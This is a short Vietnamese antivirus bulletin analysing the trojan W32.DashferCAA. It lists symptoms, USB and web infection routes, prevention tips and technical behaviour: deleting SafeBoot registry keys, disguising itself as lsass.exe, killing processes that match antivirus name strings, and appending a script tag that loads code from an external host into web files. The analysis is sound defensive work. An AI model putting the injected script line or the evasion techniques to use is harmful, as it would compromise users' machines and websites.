Malware cập nhật mới nhất:
- Tên malware: W32.DashferCAA.Trojan
- Thuộc họ: W32.Dashfer.Trojan
- Loại: Trojan
- Xuất xứ: Trung Quốc
- Ngày phát hiện mẫu: 26/02/2010
- Kích thước: 156Kb
- Mức độ phá hoại: Cao
Nguy cơ:
- Làm giảm mức độ an ninh của hệ thống.
Hiện tượng:
- Sửa registry.
- Không vào được chế độ safe mode của Windows.
- Xuất hiện popup các trang web tiếng Trung Quốc.
- Mất checkbox để hiển thị các file hệ thống.
Cách thức lây nhiễm:
- Phát tán qua trang web.
- Tự động lây nhiễm qua USB.
Cách phòng tránh:
- Không nên vào các trang web cung cấp các phần mềm crack, hack, các trang web đen, độc hại
- Không nên mở ổ USB bằng cách nháy kép vào biểu tượng ổ đĩa.
Mô tả kỹ thuật:
- Xóa các key :
HKLM\...\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\...\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
làm cho máy tính không khởi động được trong chế độ safemode.
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
- Copy bản thân thành file có tên "lsass.exe" vào thư mục %SysDir%\Com, và ~.exe vào thư mục Startup
để virus được thực thi khi khởi đông hệ thống.
- Tạo Mutex: CNJBlaipbofF để chỉ 1 file virus chạy trên 1 máy.
- Dump ra các file :
%SysDir%\Com\smss.exe
%SysDir%\Com\netcfg.dll
%SysDir%\Com\netcfg.000
%SysDir%\Drivers\Alg.exe
- Sửa key làm mất checkbox để hiển thị các file hệ thống.
- Copy bản thân thành file có tên : "pagefile.pif" kèm theo file autorun.inf vào tất cả các ổ đĩa.
- Tắt các process có chứa một trong các xâu sau : rav, avp, twister, kv, watch, kissvc, scan, guard.
- Thêm vào cuối các file có đuôi: jsp, php, spx, asp, tml, htm tìm thấy trên máy trừ ổ đĩa hệ thống (kể cả trong các file nén .rar) đoạn script :
<script src="http://js.k01[removed].com/01.asp"></script>
Chuyên viên phân tích : Nguyễn Ngọc Dũng
Một số malware đáng chú ý cập nhật cùng ngày: W32.AdobeFakeH.Trojan, W32.CcdriverMDSA.Trojan, W32.DeportsG.Trojan, W32.FakeSvchostAEGH.Trojan, W32.OnGameUPDK.Trojan, W32.WinhosteG.Trojan, W32.CimusTA.Worm...